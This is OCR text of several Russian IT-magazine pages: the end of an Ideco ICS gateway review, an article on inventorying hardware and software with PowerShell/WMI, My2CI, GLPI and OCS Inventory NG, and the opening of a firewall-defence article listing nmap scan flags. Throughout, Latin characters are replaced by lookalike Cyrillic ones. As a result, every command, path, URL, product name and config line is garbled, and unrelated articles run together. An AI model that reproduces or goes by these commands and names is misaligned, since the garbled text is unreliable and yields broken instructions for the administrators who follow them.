сЬгоог основных сервисов и проверка контрольных сумм 
системных файлов. С другой стороны, аналогичная связка 
используется и в дистрибутиве Ііпих МСВС для российских 
военных (в нем, правда, есть еще АСЬ-листы и различные 
роли для пользователей) , да и мы знаем, что им можно дове- 
рять. Настройки всех компонентов, отвечающих за защиту 
ресурсов внутренней сети, собраны в меню «Безопасность» 
и состоят из 10 подпунктов. Чтобы разрешить доступ по 
55Н, надо установить соответствующий флажок в «Общих 
настройках». Здесь же устанавливаются ограничения на 
количество сессий и блокировка сканеров портов, указы- 
вается ІР системы админа. Далее идут две группы правил 
йгеѵѵаіі: системные (то есть общие для всех) и пользователь- 
ские, которые затем можно назначить пользователям. Все 
это сделано для того, чтобы самому не копаться в ірііаЫез. 

В результате все задается в интуитивно понятной среде: ІР- 
адреса источника и назначения, протокол, порт, время дейс- 
твия, направление, интерфейс, скорость, действие. Список 
последних очень большой, от стандартных «Запретить/ 
Разрешить» до использования шейпера и фильтров. Чтобы 
просмотреть список фильтров, идем в подменю «Ключевые 
слова», где уже есть заготовки для 15 категорий. Причем 
никто не мешает тебе создать свой фильтр — достаточно 
взять за основу любой из уже имеющихся. 

В целях повышения безопасности все встроенные сер- 
висы по умолчанию отключены. Админ самостоятельно 
выбирает и активирует в разделе «Сервер» то, что ему 
действительно необходимо. Каждый раз, подключая новый 
сервис с помощью подобной сборки, я опасаюсь, что сейчас 
выйдет какой-нибудь сплойт, и придется заниматься 
обновлением вручную. В случае с Месо все выполняется 
автоматически. Есть интересный момент. В разделе «Сервер 
-> Авт. Обновление», где администратору предлагаются 
расширенные настройки обновления сервера по расписа- 
нию, есть возможность «задержки установки обновления». 
Наверное, для ожидания обновления для обновления :) . 
Рядышком находятся настройки резервного копирования. 
Но если выбрать «Сервер -> Резервное копирование -> На 
СО» и нажать на ссылку «Записать на СБ сейчас», выдается 
сообщение «Данная опция доступна только через локаль- 
ную консоль сервера». 




Настраиваем тарифный план 




Просмотр графиков загруженности 
системы ИесоІС5 



ТАКЗА ЧТО ПЛАТИТЬ? 

Конечно, есть недоделки. Но если посмотреть на тот же 
самый еВох и Месо ІС5, сразу видна разница между бесплат- 
ным решением и коммерческим продуктом. еВох — удачная 
сборка от энтузиастов, но местами собрана на коленке. На 
деле это, к сожалению, всплывает в самый неподходящий 
момент. Я до сих пор помню, каку меня отвалился подсчет 
трафика для некоторых пользователей, а любые действия 
в админке ни к чему не приводили. С грехом пополам, при 
помощи комьюнити баг все-таки удалось починить, но 
сколько времени я на это убил? В случае с платным продук- 
том я бы просто обратился в саппорт, причем в случае с Месо 
— русскоязычный. Когда продукт платный, чувствуется, 
что кто-то ответственен за то, чтобы у тебя все работало, и 
есть с кого спросить. Можно еще, конечно, поставить в плюс 
гибкость, стабильность, простоту внедрения, но пусть это 
делает официальный сайт. Я вижу только три вещи, за кото- 
рые здесь можно платить: первое — все работает с полтычка 
и без напильника, второе — есть оперативный суппорт, 
третье — гарантированные обновления самого продукта, 
антивирусных баз и контентного фильтра. Возможно, плю- 
сом будет также и то, что решение тиражное и используется 
во многих организациях. Не скажу, что я в восторге от ком- 
мерческой реализации интернет-шлюза — ничего сверхъ- 
естественного я не увидел. Но решением доволен: Месо ІС5 
закрывает много задач, и если кому-то нужна надежность, 
уверенность и поддержка от производителя, а начальство 
готово за это платить, то почему бы и нет. Месо ІС5 будет для 
них хорошим выбором. В маленькой же локалке его вообще 
можно использовать бесплатно.^ 




> іпіо 

0 решенияхдля орга- 
низации совместного 
доступа и защиты 
сети читай в статье 
«Привратник для 
локальной сети» в ][ 
07.2009. 

О специализирован- 
ных дистрибутивах 
Ыпих читай в статье 
«Сетевые регулиров- 
щики», опубликован- 
ной в январском ][ за 
2010 год. 




> СІѴСІ 

На прилагаемом к 
журналудискеты 
найдешь видеоролик, 
который познакомит 
тебя с процессом 
установки Ібесо ІС5 
и основными на- 
стройками интер- 
фейса. __ 

гкГЬь 



НТТР://ѴѴѴѴѴѴ 



> Ііпкз 



Официальный сайт 
проекта Ібесо ІС5 — 

ісіесо-войѵѵаге.ги 
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5ѴМ/АСК 



I Сергей «дгіпсіег» Ярег 



ічук дгіпгіеггазупаск.ги 



Ставим на учет 
железо и софт 

КАК ПРОВЕСТИ ИНВЕНТАРИЗАЦИЮ ОБОРУДОВАНИЯ И ПРОГРАМ- 
МНОГО ОБЕСПЕЧЕНИЯ, ОБОЙДЯСЬ МАЛОЙ КРОВЬЮ 

ІТ-парклюбой организации часто насчитываетне один десяток систем 
самой разной конфигурации. И всегда найдется парочка вольнодумцев, 
которые захотят развести начальство на внеочередной апгрейд или ус- 
тановить ПО для личных целей. Без системыучета и контроля админ рис- 
кует, как минимум, своей премией. Рассмотрим решения, позволяющие 
упростить эту задачу. 



ѴѴМІИРОѴѴЕКБНЕи. 

В ѴѴіпШ 1 4.05Р4 администраторы получили 
новый инструмент для централизованного 
управления и слежения за работой различ- 
ных частей операционной системы — ѴѴМІ 
(ѴѴіпсІоѵѵз Мапа^етепі; Іпзіпітепіагіоп, 
Инструментарий для Управления ѴѴіпсІоѵѵз) . 
Правда, в первых версиях заложенных 
компонентов было немного (всего 15). Но в 
последующих ѴѴіп2к+ их количество увели- 
чивалось вместе с возможностями. Сегодня 
ѴѴМІ доступен для всех версий ОС ѴѴіпсІоѵѵз, 
включая 5е7еп. Опрашивая различные ѴѴМІ- 
классы локальной и удаленных систем, мы 
можем получить всю необходимую информа- 
цию по имеющемуся в компании програм- 
мному обеспечению и оборудованию. 

В примерах предлагаю не использовать 
ѴВЗсгірі:, ІЗсгірі: или другие скриптовые языки, 
уж слишком они громоздки и неудобны, тем 
более у нас уже есть роскошный РоѵѵегЗЬеІІ, 
способный выполнить за нас львиную долю 
работы (подробнее о Р5 читай в ] [ 09.2009 и 
05.2010). 

Дяя начала получим список ВІ05 на подчинен- 
ных компьютерах: 

Р8> СеЬ-ѴѴМІОЬзесЦ Мп32_ВІ03 

-сотрикегЫате зупаск.ги 

Как ты понимаешь, после '-сотрЩеШате' ука- 
зывается имя хоста. Хотя при опросе локальной 
системы этот параметр можно опускать, что мы 
и будем делать в дальнейшем для краткости. 
Написав простенький скрипт, легко передать 



Се1>\УМ10Ъ]есГ список систем, с которых 
будет собираться информация. Результат при 
необходимости сохраняем в текстовый файл для 
дальнейшего анализа. 

Аналогично проводим опрос остальных пара- 
метров. Например, запрашиваем информацию 
оСРИ: 

Р8> Сек-Ѵ\/МІОкд еск Мп32_Ргосеззог 

Полный список данных, как правило, не нужен, 
поэтому отбираем только необходимые пара- 
метры: 

Р8> Сек-ШтіОкд еск Мп32_ 
СотрикегЗузкет | Зеіеск 
Мапиіаскигег , Мосіеі 

Посмотрим, какая у нас материнская плата: 

Р8> Мп32_ВазеЪоагс1 I Зеіеск 
Мапиіаскигег , Ыате, Ргобиск I 1к -а 

Классы ѴѴіп32_Сотриі:ег5у5і:ет, 
ѴѴіп32_СотриШг8у5ШтРго<іисі: и ѴѴіп32_ 
Орегайп^ЗузГет позволят собрать общие 
данные по компьютеру и системе : 

Р8> "127.0.0.1", "зупаск.ги", "рс- 
01" I Скеск-Опііпе I 
Рогеаск-Окд еск { Сек-ШЮЬз еск 
Шіп32_Сошрикег8узкеш -сошрикегЫаше 
$_ ) 

Запрашиваем версию ОС: 



Р8> Сек-Ѵ\/тіОЬз еск Ш. п32_ 
ОрегакіпдЗузкет | Зеіеск С8Кате,Виі1 
(іМитЬег , ЗегѵісеРаскМаІ огѴегзіоп 

При желании результат можно сохранить в 
файл, например «ЕхроіТ-СНХМЬ С:\с1іеск.хт1», а 
затем отфильтровать или обработать: 

Р8> Ішрогк-СІіХМЬ С:\скеск.хт1 | 
Оик-СгісІѴіеѵ\г 

Полный список ѴѴіп 32_* классов и свойств до- 
ступен в документации М8ПЫ «ѴѴіп32_СІаззе5» 

(ккрѴ/тзкп.тісгозоК.сот/еп-из/ІіЪгагѵ/ 
аа394084%28ѵ=Ѵ5.85%29.азрх) . Альтернатив- 
ный вариант — воспользоваться функцией по- 
иска. К примеру, просмотрим список объектов, в 
именах которых присутствует слово сіізк: 

Р8> Сек-ШііОкдеск -Ызк I ѵйіеге {$_. 
паше -такск "сіізк"} 

ГОТОВЫЕУТИЛИТЫ И ПРИЛОЖЕНИЯ 

Если хорошо поискать в интернете, можно 
найти не один десяток готовых ѴѴМІ-скриптов 
на самых разных языках программирования, 
которые легко адаптируются под твои нужды. 
Мое внимание привлекло НТА-приложение 
Нагйѵѵаге Іпѵешогу (ѵѵѵѵѵѵ.гоЬѵапбегѵѵоийе.сот/ 
кагсКѵаге.ркр) с веб-оболочкой. Просто вводим 
имя компьютера и получаем данные об уста- 
новленном оборудовании. При необходимости 
можно отредактировать сырец в текстовом ре- 
дакторе, дополнив его нужными параметрами 
(опрос ѴѴМІ-объектов реализован на ѴВЗсгірі:) . 
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Сторонними разработчиками создан ряд специальных командлетов, 
упрощающих написание скриптов. Скрипт Сотрійег Іпѵепшгу Зсгірі; 
(Сотріпѵ) , который доступен на сайте уѵѵегзЬеІІрго . сот, позволяет 
получить информацию о железе, ОС и сохранить все собранные данные в 
ЕхсеГевский файл для дальнейшего анализа. После запуска скрипт задаст 
несколько вопросов, отвечая на которые, админ выбирает режим сбора 
данных. Список компьютеров для проверки определяется при помощи 
специального текстового файла, также скрипт может автоматически 
проверить все системы или серверы, входящие в домен. Как вариант — 
имя компьютера задается вручную. По умолчанию используется текущая 
учетная запись, но, ответив «Уез» на вопрос «ѴѴоиІсІ уои Нке Іо изе ап 
акегпагіѵе сгесіепіііаі? », можно указать требуемую учетную запись. 

Чтобы затем не запускать созданный скрипт самостоятельно, поручим это 
ЗсЬТазкз. Например: 

> ЗскТазкз / СКЕАТЕ /ТБ СЬескЗсгірк /ТЕ "рсжегзкеіі . ехе 
-поргоіііе -ехесикіопроіісу БпгезБгісБесІ 
-гііе скеск.рзі" /ІТ /КБ НІСНЕЗТ /ЗС БАІБУ 

В результате создается задание с названием СЬескЗсгірЦ которое будет 
ежедневно выполнять Р5-скрипт скеск.рзі, причем с наивысшим приори- 
тетом. 

Вместе с системой инвентаризации оборудования и установленных при- 
ложений №іРоіпі Гѵѵѵѵѵу.пещех.пег) предлагается набор Р5-скриптов (Сеі:- 
Нет >ѵ ) , предназначенных как раз для сбора определенного типа данных 
о подчиненных системах. Например, просмотрим наличие свободного 
места на харде: 

Р3> СеБ-БеББодісаІБізк -БгіѵеТуре "Босаі Бізк" 

I ѵкіеге { $_.Егее8расе / $_.3іге -1к .10 } I % { 

$_. СотрикегЗузкетБаше } 

Теперь попробуем собрать информацию об установленных программах: 

Р3> Сек-БекРгодгат -Зузкет зупаск.ги -Бпіпзкаііесі $Ра1зе 



I % { $_. БізрІауБате } I зогк -ипідие 

Всего в поставку входит 20 командлетов. 

Доступна бесплатная версия МеіРоіпІ Ехргезз ЕсИйоп, которая работает в 
32/64-битных ѴѴіпХР/2кЗ/2к8/ѴІ5і:а/5е7еп, ее можно применять в сетях 
любого размера. Для установки ИеІіРоіт понадобится наличие Р5 2.0, 115 и 
ЗОЬ-сервера (достаточно Ехргезз ЕсИноп) . 

Кстати, список установленных программ можно получить, просто прочи- 
тав нужную ветку реестра: 

Р3> СеБ-ІБетРгорегБу НКБМ: \30РТ^АРЕ\МісгозоІР\ 
1л?іп(іоѵ7з\СиггепкѴегзіоп\Бпіпз1:а11\* I РогтаБ-ТаЫе 
БізрІауЫаше , РиЫізкег | ОиР-СгісіѴіеілг 

Командлет ОиИ-СгісІѴіеѵѵ выводит данные в отдельном окне с возмож- 
ностью поиска и сортировки. 

МИНУСЫ ИСПОЛЬЗОВАНИЯ СКРИПТОВ 

Если сбор данных при помощи ѴѴМІ/РоѵѵегЗЬеІІ довольно прост, то все 
отчеты и изменения в конфигурациях приходится контролировать 
вручную. Конечно, можно усложнять свои скрипты, пытаясь автоматизи- 
ровать процесс, но не каждый захочет тратить на это время. Здесь стоит 
напомнить, что МісгозоЙ предлагает необходимую функциональность 
в 5ССМ (ЗузЩт Сепііег Сопй^игагіоп Мапа§ег) , о котором мы уже писали 
в номерах 08.2009, 09.2009 и 01-02.2010. Но в тех случаях, когда в распоря- 
жении админа находятся также *піх системы, всевозможные роутеры 
и прочее оборудование, которое необходимо учитывать, ѴѴМІ — уже не 
помощник. Кроме того, остается проблема визуального представления 
данных и отчетов. Здесь придется прибегнуть к сторонним программам (в 
том числе распространяемым под свободными лицензиями), благо, есть 
из чего выбирать. 

СИСТЕМА ИНВЕНТАРИЗАЦИИ МУ2СІ 

Многие, кто пробовал систему инвентаризации гСІ (гсьзкпеі), находили 
ее довольно удачным решением, но ей не хватало возможности заносить 
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Получаем список ѴѴМІ-объектов 



данные вручную и локализованного интерфей- 
са. Конечно, это не критические моменты, но 
есть и другие мелочи. Например, нельзя удалить 
устройство через веб-интерфейс — необходи- 
мо вручную составить ЗС^Ь-запрос на очистку 
данных из таблиц. Система инвентаризации 
Му2СІ С Епеіі/ргоіесііз/тѵгс ;") является форком 
гСІ. Разработкой занимается Юрий Винник, 
он довел гСІ до нужных кондиций: интерфейс 
переведен на русский и украинский языки, 
добавлены новые поля в таблицы (например, 



размещение компьютера) и упрощено управле- 
ние. Для работы Му2СІ потребуется любой веб- 
сервер с поддержкой РНР (с РЕСЬ, РНР Ехііепзіоп 
СоттипПуЫЪгагу) иМуЗСД,. 

Распаковываем архив ту2СІ-1.2.1.2Ір в корневой 
каталог веб-сервера и в файле гсісопй^.рйр 
указываем параметры доступа к МуЗС^Ь: 

$ зисіо папо гсісопйд.рЬр 

геЕигп ЬЬх_соппесЕ (БВХ_МУ30Ь, "Іосаі 

ЬозЕ " , " гсі " , " гсі " , "раезжі" ) ; 



Проект СЬРІ 

6БРІ (Сезііоп ЬіЪге сіе Раге ІпГогтаІіцие, ^Ірі-ргоіесі.ог^і — еще один проект, ко- 
торый пользуется заслуженной популярностью у админов. Кроме задач по учету 
компьютеров и комплектующих, он позволяет хранить данные по остальному 
«хозяйству», включая расходные материалы. В отличие от ОС8N6, администратор 
самостоятельно наполняет базу устройств, используя локализованный веб-ин- 
терфейс. Но проблема эта решается за счет использования плагина, интегриру- 
ющего (тЬРІ с ОС81Жт. Поэтому их часто устанавливают вместе. Для включения 
поддержки необходимо перейти в «Установки - Общие» и переключить «Активиро- 
вать режим ОС8КГС» в значение «Да». После этого в меню появится новая вкладка 
«Режим ОС8N6», в которой можно синхронизировать данные. 

На основе СЬРІ легко организовать службу технической поддержки пользова- 
телей, что очень удобно, ведь вместо звонка юзер оставляет заявку, которая регис- 
трируется системой. Затем ІТ-подразделение ее обрабатывает. Это дисциплини- 
рует пользователей — они перестают звонить по мелочам, а у админов появляется 
база обращений для отчета о проделанной работе. Но возможности СЬРІ этим не 
ограничиваются. Он позволяет создать базу знаний, состоящую из статей, вести 
учет поставщиков, договоров. Система снабжена большим количеством самых 
разных отчетов с возможностью экспорта результата в файл формата РБР, С8Ѵ 
или 8ІК. Поддерживается синхронизация календаря по протоколам іСаІ, ѴѴеЪсаІ. 
Функциональность легко расширяется за счет плагинов, доступных на сайте 
проекта (р іи щпз.^ірі-ргоіесі.ог^) . Кроме ОС81ѴО можно импортировать данные с 
сервера Сасіі или №§іо§. 

Пакет ОЬРІ имеется в репозитариях основных *піх дистрибутивов. Установка при 
помощи исходных текстов стандартна для приложений, написанных на РНР и 
требующих наличия веб-сервера и Му8(2І« 




Смотрим списокустановленных 
программ с использованием Оиі- 
бгісІѴіеѵѵ 

Чтобы создать таблицы в БД, используем скрипт 
ту5^15С^ір1:.5^1, находящийся в каталоге еп§іпе. 
Записи внутри нужно привести в соответствие 
сданными: 

$ 511СІ0 папо ту5рІ5СГІрІ.5ЯІ 

сгеаЕе ЬаЕаЬазе гсі; 

дгапЕ аіі оп гсі.* До 
' гсі ' @ ' ІосаІЬозЕ ' ісІепЕіііесІ Ьу 
' раззѵгсР ; 

# Если не планируется доступ к БД с 
других систем, последнюю строку ком- 
ментируем 

# дгапР зеІесЕ , сіеІеЕе , іпзегР , ирЬаЕе 
оп 2 с і . * До ' 2 с і 1 @ ' % ' ісіепЕіііесІ Ьу 

' 2 с і ' ; 

Локализация интерфейса производится уста- 
новкой переменной “$Ьап§” в значение “ш” в 
файле 1ап§сопй§.рЬр. 

Для сбора информации в ѴѴіпсіоѵѵз-системе 
используется ѴѴіпбоѵѵз ЗсгірГ НоЫ, в Ііпих — 
ІзЬѵѵсІіепі: на Іаѵа. Все компоненты находятся в 
подкаталоге асЫ-опз и еп§іпе. Здесь же лежат М 5 
ѴѴіпсіоѵѵз 5сгіриіп§ Но5И 5.6 и М5 ѴѴМІ Соге 1.5, 
которые необходимы для работы клиентской 
части в \Ѵіп95/98/ОТ4. Перед развертыванием 
в файлах ЩкебаЩ^з и ЫтѵѵсІіепіДаѵа следует 
изменить значение переменной Му2СІраі:Ь. и 
Му2СІ5егѵег, чтобы она указывала ШИ сервера. 
Процесс настройки клиентской части на конеч- 
ных системах упрощен. Так, скрипт іпзтП.зІі, 
используемый при установке в Ыпих, проверяет 
наличие пакетов ІзЬѵѵ, )<ік и геаб-есШ (инфа о 
мониторе) и при их отсутствии выдает поясни- 
тельное сообщение. Далее происходит сборка 
Іаѵа-клиента и установка задания сгоп. После 
развертывания Му2СІ нужно подключиться 
к серверу с удаленной системы и зарегистри- 
ровать компьютер, нажав соответствующую 
ссылку на главной странице. Информация 
о новой системе должна появиться в базе 
Му2СІ. Скачиваем с главной страницы архив с 
клиентской частью и запускаем установщик. 
После чего скрипты начнут отсылать данные на 
сервер. 

Интерфейс предельно прост и позволяет выво- 
дить детальную информацию о железе, вносить 
и редактировать данные о компьютерах, 
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Приложение Нагсіѵѵаге Іпѵепіогу 

группировать, искать системы по определенному критерию 
(например, тип видеокарты и монитор) , отслеживать изме- 
нения. Меню администратора позволяет определять статус 
(закреплен, аренда) и местонахождение системы. 

СИСТЕМА 0С5 ІЫѴЕЫТОКУ N6 

Решение ОС5 Іпѵепіогу N0 (ОС5МЗ, Ореп Сотрійегз апсі 
Зойѵѵаге ІпѵепШгу Ыеѵѵ Сепегагіоп, осзіпѵепшгѵ-п^. ог^) 
позволяет произвести инвентаризацию комплектующих и 
программного обеспечения, установленных на компьютерах 
в локальной сети, и отслеживать их изменения, периодичес- 
ки получая данные о конфигурации систем. Еще одной полез- 
ной функцией является возможность удаленной установки 
программ и выполнения команд. Для сбора информации на 
клиентские компьютеры устанавливается программа-агент. 
Агент доступен практически для всех версий ѴѴіпсІоѵѵз от 95 



Локализация 

ОС$ЫС/СЬР1 

Интерфейс ОС 81 ѴО локализован, но все же есть 
небольшие проблемы, приводящие к тому, что 
русскоязычные названия программ, установ- 
ленных в ѴѴІПСІ01/Ѵ8, отображаются некорректно. 
Дело в том, что в €>€§N 6 изначально использу- 
ется кодировка І8О-8859-1 (для отображения СР- 
1251), в ОііРІ — ШТ8. При импорте данных ОС 81 МО 
-> СЬРІ также возникают проблемы с кодиров- 
ками. Известно два пути решения: 

1. На лету при экспорте менять данные и ис- 
пользуемые шрифты. Чтобы сделать это, нужно 
поправить файл ехрог1;.йшс1;іоп.р1ір и при 
помощи пакета Шгріі создать новые шрифты, 
поддерживающие ШТ8. 

2. Изначально научить ОС8N6 работать с ШТ8. 
Для этого предложены патчи и пересобранные 
установочные файлы для ѴѴіпсІоі/ѵ8. Скачать их 
можно с Нр: / / 1 іпѵіпц 8 .гц/ос 8 . Здесь же находят- 
ся готовые йеЬ-пакеты для ТЛэипШ/ОеЫап. 
Кроме того, в файле іпс/ос 8 п§.с 1 а 88 .р 1 ір следует 
изменить строку «$іЫ8->(іЬепс= " Іаііпі " ;» на 
«$іЬІ8->йЬепс= " и1;^8 " ;» и в /е1с/р1ір5/арас1іе2/ 
рЬр.іпі проверить установку «Йе^аи11;_с1іаг8е1; = 
"Ш*-8"». 




Информация об оборудовании, собранная 
0С5ІЧ6 

до 2к8К2, Ьіпих, Мае 05 X, *В50, Боіагіз, ІВМ АІХи НР-ЦХ. Все 
собранные данные агенты отправляют на сервер управления 
(тапа^етеш зегѵег) в виде ХМЬ-потока, сжатого при помощи 
библиотеки 2НЬ. Дяя передачи используется стандартный 
протокол НТТР/НТТР5, поэтому проблем с йгеѵѵаІГом обыч- 
но не возникает. При помощи агентов реализована функция 
"ІР сіізсоѵегу", которая помогает находить все сетевые и пери- 
ферийные устройства, работающие в локалке, в том числе 
те, на которые нельзя установить агента (свитчи, принте- 
ры, ѵѵеЪ-камеры и т.д.) Агенты сканируют сеть в поисках 
подобных устройств и отправляют сведения о них на сервер 
для анализа. 

Версия для ѴѴіпс1оѵѵ5 написана на С + + , *піх вариант — на 
Регіи С. 

Серверная часть 0С5ЖІ включает в себя четыре компонента, 
которые необязательно должны быть установлены на одном 
сервере. Это СУБД (МуЗС^Ь) для сбора данных, а также веб- 
сервер, который может играть одну из трех ролей: 

• Служба связи — обеспечивает связь по протоколу НТТР 
между сервером базы данных и программами-агентами 
(АрасЬе 1 . 3 .Х/2 .X с интегрированным Регі, в ЭеЪіап/ЦЪипШ 
пакет НЪарасЬе-сІЪі-регІ) ; 

• Служба развертывания — хранение установочных файлов 
программ-агентов (любой веб-сервер с поддержкой ЗЗЬ) ; 

• Консоль управления — просмотр собранных данных в брау- 
зере (веб-сервер с поддержкой РНР с 2ІР и СЭ) . 

Серверная часть 0С51ЧС может быть установлена на компью- 
тер, работающий под управлением ѴѴіп2к/ХР/2кЗ, Ііпих, 
*В5Э, Зоіагіз, ІВМ АІХиМасОЗХ. 

УСТАНОВКА 0С5ЫС 

Нужный пакет имеется в репозиториях большинства дис- 
трибутивов, хотя обычно это не самая актуальная версия. 
Самостоятельная сборка из исходных текстов при внима- 
тельном подходе не должна вызвать трудностей. Установоч- 
ный скрипт зешр.зй, находящийся внутри архива, проверит 
наличие требуемых компонентов и выдаст рекомендации по 
устранению проблем, если в этом будет необходимость. 

В ЭеЫап/Шшпш для ручной сборки нужно накатить пакеты: 

$ зисіо арД-деД іпзДаІІ 1іЬараске2-тос1-рег12 
ІіЪсіЪі-регІ ІіЬараске-сПэі-регІ ІіЬсІЪсІ-туздІ- 
регі ІіЬзоар-ІіДе-регІ 1іЬхт1-зітр1е-рег1 
ІіЪпеД-ір-регІ 1іЬсотргезз-2ІіЪ-рег1 рЪр5-дс1 

И ХМЬ: : Епгійез из хранилища СРАМ : 




> СІѴСІ 

На прилагаемом 
кжурналу диске 
ты найдешь видеоро- 
лик, в котором пока- 
зано, какустановить 
и настроить связку 
0С8Ы6 + еі_РІ. 




НТТР://ѴШѴѴ 

■ Г 

> Ііпкз 

• Полный СПИСОК 
ѴѴіп32_* классов 
можно найти в 
документации М50Ы 
«ѴѴіп32_С1а55е5» — 
тзсІп.ппісгоБок.сот 



• Сайт проекта 
ЫеіРоіпІ — пеиіех.пеі 

• Сайт проекта Му/СІ 

— 5І.пеі/рго]есІ5/тѵ2СІ 

• СайтпроектагСІ — 

гсі.ві.пеі 



• Сайтпроеета 0С5ЫС 

— оегіпѵепіогѵ-пд.огд 




> іпіо 

Многие утилиты, 
выпускаемые под 
коммерческими ли- 
цензиями, использу- 
ют для сбора данных 
именно ѴѴМІ — это 
удобно, так как не 
требуется установка 
агентов на удаленные 
системы. 
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Список установленных пакетов в 0С5Ы6 



$ зибо срап -і ХМЬ: :ЕпРіРіез 

В процессе установки будут созданы все необходимые конфигурационные 
файлы и алиасы для веб-сервера. Так как файлы, которые могут распро- 
страняться при помощи ОС5ЫС, часто имеют большой размер, следует 
установить нужные значения переменных ро$і:_тах_5І2е и ир1оа<і_тах_ 
Шезіге в файлах /еШ/рЬр5 /ар асйе 2 /рЬр . іпі (по умолчанию — 8 и 2 Мб) 
и осзіпѵепюгу-герогіз.сопЕ После всех настроек вызываем браузер и 
запускаем установочный скрипт ЬнрУЛосаШозЕ/осзгерогЩ/тзшП.рЬр. 
где указываем параметры доступа к БД . В процессе установки для доступа 
к базе осзѵѵеЬ будет создана учетная запись «осз» с паролем «осз». Если 
доступ к базе не ограничен локальной системой, в целях безопасности 
дефолтный пароль следует изменить. Для установки агента в Ііпих потре- 
буется наличие некоторых модулей Регі (ХМЬ и 2НЪ) и бтібесобе. 

$ зисіо арк-дек іпзкаіі 1іЬсотргезз-2ІіЬ-рег1 1іЪпеЕ-ір- 
регі ІіЬпеЕ-ззІеау-регІ ІіЪѵтѵі-ретІ ІіЬхтІ-зітрІе-регІ 
ро-беЪсопІ иск бтісіесосіе рсіикііз 

После чего агент устанавливается стандартным для РегГовых приложений 
способом: 

$ Еаг хгѵі: ОсзіпѵепЕогу-АдепЕ-1 . 1 . 2 . Еаг . дг 
$ ссі ОсзіпѵепЕогу-АдепЕ-1 . 1 . 2 
$ регі МакеІіІе.РЬ 
$ таке 

$ зисіо таке іпзкаіі 

Далее скрипт начнет задавать ряд вопросов по размещению конфигура- 
ционных файлов. Вводим данные сервера, создаем тэг (для группировки 
систем), активируем задачу для сгоп. По окончании настройки собранные 
данные о конфигурации компьютера отправляются на сервер. Если связь 
установлена и получаем ответ «Зиссезз ! », установку агента можно считать 
законченной. Его данные появятся в веб-консоли, в разделе «Все компью- 
теры». В каталоге /ѵаг/НЬ/ос5Іпѵепі:огу-а§епі: будет создан ХМЬ-файл, 
содержащий текущую конфигурацию компьютера. Если же соединения 
не произошло, запусти агент в режиме отладки: 

$ осзіпѵепЕогу-адепЕ -1 /Етр -сіеЬид --зегѵег Ь.ЕЕр:// 
осзпд-зегѵег/осзіпѵепЕогу 

Обычно полученной информации хватает для диагностики ошибок. 

Агент для ѴѴіпбоѵѵз может быть установлен несколькими способами. Са- 
мый простой — вручную или с помощью прилагающегося 1о§оп скрипта. 



Ш К * & В I 




Связываем ѲІ.РІ с 0С5Ы6 



После инсталляции сервера установочный файл агента можно импор- 
тировать в базу ОСЗЫС. Просто выбираем вкладку «Агент» и указываем 
месторасположение файла, после чего он будет доступен с любого ком- 
пьютера сети. Установка стандартна: на последнем этапе сообщаем имя 
или ІР-адрес ОС5ЫС сервера, и, чтобы сразу же сформировать и отправить 
отчет, устанавливаем флажок «Іттебіаііеіу ІаипсЬ іпѵепшгу». Далее агент 
прописывается в автозагрузку и стартует в качестве сервиса. 

РАБОТА С ИНТЕРФЕЙСОМ 0С5Ы6 

Интерфейс локализован, поэтому, чтобы разобраться с его использова- 
нием, много времени не понадобится. По умолчанию на вкладке «Все ком- 
пьютеры» показаны семь основных характеристик клиентских машин. 
Список «Абб соіитп» позволяет легко добавить еще до 23 полей. Очень 
удобно, что данные поддаются ручному редактированию. Также следует 
отметить легкий поиск и удаление дубликатов систем. 

Как уже говорилось ранее, в ОС5ЫС заложена возможность установки 
приложений и запуска скриптов (ЬаЦ ѵЪз и т.п.) Такая функциональность 
сильно выручает. Создаем пакет в Періоушепі: — Виііб и заполняем поля 
Иеѵѵ раскате Ьиі1біп§: название, Ргіогііу (порядок установки) и действие в 
Асгіоп. Предусмотрено три варианта: 

- ЗЕоге — копировать на целевую систему; 

- ЕхесиЕе — копировать и выполнить с командой; 

- ЬаипсЪ. — копировать и запустить. 

Параметры в ІІзег погійсагіопз позволяют вывести предупреждение поль- 
зователю и разрешить ему отменять задачу. 

После создания пакета его следует активировать в Періоутеш — АсгіѵаШ. 
Вводим Ш1 сервера и нажимаем «Отправить». Выбираем компьютер, 
на который будем устанавливать пакет, переходим в меню СшШтігайоп 
и нажимаем ссылку Абб раскате. Указываем пакет и запускаем процесс 
нажатием АйесЕ Состояние задачи выводится в СизФтігабоп, общая 
статистика доступна в таблице АсгіѵаЩ. 

В ОС5ЫС инициатором соединения выступает агент, который подклю- 
чается к серверу раз в сутки, отправляет информацию о состоянии и 
получает задания. Если созданный пакет необходимо установить раньше, 
на клиенте следует принудительно запустить команду ос5Іпѵепі:огу-а§епі:. 

ЗАКЛЮЧЕНИЕ 

После настройки и заполнения базы данных в системе инвентаризации 
ты будешь постоянно иметь под рукой актуальную информацию о теку- 
щем состоянии компов и сможешь отслеживать изменения. Отчеты, ко- 
торые она генерирует, дают возможность быстро определить конфигура- 
цию типового компьютера, используемого в организации, что сослужит 
хорошую службу при планируемом апгрейде или смене ОС. т 
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■ ■ Евгений Зобнин іІтОзупаск.ги 



Огненная дуга 

ЗАЩИЩАЕМСЯ ОТ ВЗЛОМЩИКОВ С ПОМОЩЬЮ ІРТАВІ.Е5, ІРРѴѴ И РР 

Брандмауэр — первая линия защиты любого сервера, и от его правиль- 
ной настройки зависит, сможетли злоумышленник продвинуться даль- 
ше в своих попытках проникновения в систему. Современные файеры 
предлагают множество механизмов обеспечения безопасности, исполь- 
зуя которыеты можешьоставить«неудел»99% атакующих. И всеэтобез 
необходимости покупки дорогостоящего оборудования и коммерческого 
софта. 



Главная цель всех взломщиков — получение 
доступа к командному интерпретатору сервера 
для использования его возможностей в своих 
интересах. Наиболее часто проникновение в 
«святая святых» осуществляется с помощью дыр 
в сервисах или же через подбор пароля (брут- 
форс) к одному из них (например, ззіі) . 

СКАНИРОВАНИЕ ПОРТОВ 

Чтобы выявить наличие уязвимых сервисов 
на машине, атакующий производит разведку с 
помощью сканера портов и различных систем 
обнаружения уязвимостей. Обычно в качестве 
сканера портов используется птар, который 
способен осуществлять сканирование десятком 
различных способов и в некоторых случаях уме- 
ет выявлять версии ОС и сервисов. Вот список 
особенно популярных флагов птар, которые 
обычно используют взломщики: 

Флаги птар, используемые 
при сканировании 

-зТ — обычное ТСР-сканирование с 
помощью открытия соединения на ука- 
занный порт и его завершения; 

-зЗ — ЗУЫ/АСК-сканирование , связь 
разрывается сразу после ответа на 
запрос открытия соединения; 

— зІІ — ГОР-сканирование; 

-зЕ — сканирование пакетами с уста- 
новленным флагом ЕШ; 

-зХ — сканирование пакетами с уста- 
